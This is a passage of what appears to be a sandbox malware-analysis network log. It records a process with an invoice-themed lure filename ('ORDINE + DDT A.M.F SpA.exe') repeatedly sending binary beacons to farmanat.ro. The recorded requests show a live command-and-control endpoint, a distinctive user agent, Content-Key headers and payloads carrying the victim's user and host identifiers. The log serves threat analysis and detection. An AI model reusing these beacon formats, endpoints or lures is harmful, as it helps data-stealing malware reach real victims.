Nov 25, 2021 10:51:48.710149050 CET	6917	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
43	192.168.11.20	49879	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:29.436238050 CET	6370	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:29.469530106 CET	6370	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:29.519896030 CET	6370	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
430	192.168.11.20	50274	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:49.081962109 CET	6918	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:49.115370035 CET	6918	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:49.164314032 CET	6919	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
431	192.168.11.20	50275	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:49.567233086 CET	6919	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:49.601313114 CET	6920	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:49.650599003 CET	6920	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
432	192.168.11.20	50276	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:50.073434114 CET	6921	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:50.107034922 CET	6921	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:50.156475067 CET	6921	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
433	192.168.11.20	50277	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:50.587693930 CET	6922	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:50.622014046 CET	6922	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:50.675915956 CET	6923	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
434	192.168.11.20	50278	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:51.089071035 CET	6923	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:51.122725010 CET	6924	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:51.172583103 CET	6924	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
435	192.168.11.20	50279	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:51.558423042 CET	6925	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:51.592035055 CET	6925	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:51.641408920 CET	6925	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
436	192.168.11.20	50280	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:52.059237957 CET	6926	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:52.093511105 CET	6926	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:52.143548965 CET	6927	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
437	192.168.11.20	50281	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:52.528089046 CET	6927	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:52.562410116 CET	6928	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:52.614006042 CET	6928	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
438	192.168.11.20	50282	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:53.007932901 CET	6929	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:53.042098999 CET	6929	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:53.092668056 CET	6929	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
439	192.168.11.20	50283	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:53.539836884 CET	6930	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:53.573438883 CET	6930	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:53.622716904 CET	6931	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	192.168.11.20	49880	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:29.956862926 CET	6371	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:29.991008997 CET	6371	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:30.042423010 CET	6372	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
440	192.168.11.20	50284	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:54.048854113 CET	6931	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:54.082403898 CET	6932	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:54.131594896 CET	6932	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
441	192.168.11.20	50285	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:54.571504116 CET	6933	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:54.605751038 CET	6933	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:54.655401945 CET	6933	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
442	192.168.11.20	50286	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:55.074582100 CET	6934	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:55.108170986 CET	6934	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:55.157455921 CET	6935	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
443	192.168.11.20	50287	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:55.507302046 CET	6936	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:55.541939974 CET	6936	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:55.597352982 CET	6936	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
444	192.168.11.20	50288	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:56.038111925 CET	6937	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:56.071635962 CET	6937	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:56.120891094 CET	6938	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
445	192.168.11.20	50289	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:56.542011976 CET	6939	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:56.575879097 CET	6939	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:56.625315905 CET	6939	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
446	192.168.11.20	50290	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:57.052498102 CET	6940	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:57.086070061 CET	6940	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:57.135432959 CET	6940	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
447	192.168.11.20	50291	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:57.572349072 CET	6941	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:57.606625080 CET	6941	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:57.656439066 CET	6942	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
448	192.168.11.20	50292	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
